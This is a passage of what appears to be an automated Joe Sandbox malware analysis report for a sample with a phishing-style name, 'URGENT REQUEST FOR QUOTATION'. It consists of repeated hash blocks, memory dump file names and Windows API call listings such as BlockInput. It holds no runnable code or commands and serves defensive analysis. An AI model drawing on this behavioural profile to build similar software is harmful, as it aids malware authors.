                                                                                                                      • Instruction ID: 82c289e151f4f31c7b780caea2108a696b332f9d161759d20325bc0295797290
                                                                                                                      • Opcode Fuzzy Hash: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                                                                                                      • Instruction Fuzzy Hash: 14B14C31610608DFD755CF28C48AB697BE1FF45364F258658E89ACF2A2C736E991CB40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                                                      • Instruction ID: e1f9390d9f25e16bc1eb94143f27fdd5d8c46aff02e9e554b92427adaf45ad9f
                                                                                                                      • Opcode Fuzzy Hash: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                                                                                                      • Instruction Fuzzy Hash: 6C1250B19002299FDB64DF58C8806EEB7F5FF48710F5481AAE849EB251DB349E81CF94
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 000AEABD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                                                      • Instruction ID: 0ede50adcfaecb5d9411b9ddadb8ff3bf4716b660c8580446f5e0bf718de675e
                                                                                                                      • Opcode Fuzzy Hash: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                                                                                                      • Instruction Fuzzy Hash: 70E01A362002049FD710EF99D804E9AB7EDAFA9760F00842AFD49DB351DA70AC408B91
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                                                      • Instruction ID: 30439418e2658f28c5aae0a513585a5a54712a62a67685fcbd5bb606e5e02e31
                                                                                                                      • Opcode Fuzzy Hash: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                      • Instruction ID: 9760d05a73ce98cd3e9533e2b73cc5d80217305d5b8fd789aca9d296cb7a17de
                                                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                      • Instruction Fuzzy Hash: 7751477168C6055ADFB88568A85D7FF63C9DB52302F180509DC8ED7282CE16EE0DF362
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                                                      • Instruction ID: 2d8f93fdac0a7e798ccf80a6027b4fe8ccfa2aa728c4295cdb1e0be65b5a4207
                                                                                                                      • Opcode Fuzzy Hash: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                                                                                                      • Instruction Fuzzy Hash: 9E32F222D2AF414DE7239634DC22335A78AAFB73D9F15D737EC1AB59A5EB29C4834100
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                                                      • Instruction ID: ff493c746c60c608e6bd2add35e8e3227f13083571656b4574ca26703f00cfd7
                                                                                                                      • Opcode Fuzzy Hash: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                                                                                                      • Instruction Fuzzy Hash: 0E321171A002558BFFB8EA28C4D4EBC7BF1FB45314F28817AD5CA8B691D2309D81DB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 97bc4358d5d80bfbb7c5d868003a84b350efb72b5d07659e961a2b88a8381792
                                                                                                                      • Instruction ID: 103e852e209d199b3090ec3182ee546c74fa52a62be9e9cefdb5be0dbb0de696
                                                                                                                      • Opcode Fuzzy Hash: 97bc4358d5d80bfbb7c5d868003a84b350efb72b5d07659e961a2b88a8381792
                                                                                                                      • Instruction Fuzzy Hash: E922B2B0E0460ADFDF25CF64C881AEEB3F5FF44301F108529E81AA7291EB79A955CB54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e33c6e63aa6d49bf5a25bc82369e05bd0d09cd66b5958aa63d11f541856650f2
                                                                                                                      • Instruction ID: a39dfa5cd2237fd5ecc5c87f5bc7822f99e5edf4a54e8ecfa9a81c4a2e9cd014
                                                                                                                      • Opcode Fuzzy Hash: e33c6e63aa6d49bf5a25bc82369e05bd0d09cd66b5958aa63d11f541856650f2
                                                                                                                      • Instruction Fuzzy Hash: 5202D8B0E00106EFDB15DF54D881AAEB7B5FF48300F11C169E81A9B291EB75EE11CB95
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                      • Instruction ID: e086eb4db394a85e079ec0a0296ec660d565ddfeca7436132be83485c0612334
                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                      • Instruction Fuzzy Hash: 7B9175321080A34ADB69463A85356BFFFF15B923A371A079DDCF2CA1C1EE20895CD620
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                      • Instruction ID: 3c22fd8e610a89ff0294d01a078be1ec849a3850666fc59a280ee7f0b25379bd
                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                      • Instruction Fuzzy Hash: 949159722090A349EB6E427A85741BFFFE15B923A371A079DD8F2CA1C1FE14C55CD620
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                                                      • Instruction ID: 1c239922c3d26797c019bb7979dd0dd58b6d849e8d3d07f815208a87b5e22845
                                                                                                                      • Opcode Fuzzy Hash: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                                                                                                      • Instruction Fuzzy Hash: C661577160870956FAB49928B899BFF23D8DF81303F144919ED4EDB282DB119E4EF316
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                                                      • Instruction ID: 0974ede9832ee465892a7d7a63a0bbe8f64f14fc9af6c71efb813052626904df
                                                                                                                      • Opcode Fuzzy Hash: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                                                                                                      • Instruction Fuzzy Hash: BB615A7120870956DEB84928785ABBF23F8DF45703F104959EC4BDB282EA129D4EF365
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                      • Instruction ID: 7da379901184674684e3663439507fe453b54dbc7ea72cad7aa46965708e76ad
                                                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                      • Instruction Fuzzy Hash: BC81547250D0A309DBA9423D85346BFFFE15F923A371A079DD8F2CA1C1EE24995CD620
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                                                      • Instruction ID: 09edbdb4bc4fdd216f7a3e9914ef2cb1cb304785a4d519dae52ca4d7d8ee5d11
                                                                                                                      • Opcode Fuzzy Hash: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                                                                                                      • Instruction Fuzzy Hash: DF21B7326206118BD728CF79C823A7E73E5AB54310F15862EE4A7C37D1DE7AA944CB80
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B30
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B43
                                                                                                                      • DestroyWindow.USER32 ref: 000B2B52
                                                                                                                      • GetDesktopWindow.USER32 ref: 000B2B6D
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2B74
                                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000B2CA3
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000B2CB1
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B2D04
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000B2D40
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D62
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D75
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D80
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000B2D89
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D98
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000B2DA1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA8
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DB3
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DC5
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,00000000), ref: 000B2DDB
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DEB
                                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000B2E11
                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000B2E30
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2E52
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B303F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                                                      • Instruction ID: e50d27151ea63e1c06794060a67721acb4deccd484197104a7db99f0f8b360f1
                                                                                                                      • Opcode Fuzzy Hash: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                                                      • Instruction Fuzzy Hash: AA025C71900209EFEB14DF64CD89EAE7BB9FF49314F148158F919AB2A1CB74AD41CB60
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C712F
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C7160
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000C716C
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 000C7186
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000C7195
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C71C0
                                                                                                                      • GetSysColor.USER32(00000010), ref: 000C71C8
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 000C71CF
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 000C71DE
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000C71E5
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 000C7230
                                                                                                                      • FillRect.USER32(?,?,?), ref: 000C7262
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7284
                                                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000012), ref: 000C7421
                                                                                                                        • Part of subcall function 000C73E8: SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                                                        • Part of subcall function 000C73E8: GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000011), ref: 000C7463
                                                                                                                        • Part of subcall function 000C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                                                        • Part of subcall function 000C73E8: SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,?), ref: 000C7498
                                                                                                                        • Part of subcall function 000C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                                                        • Part of subcall function 000C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                                                        • Part of subcall function 000C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
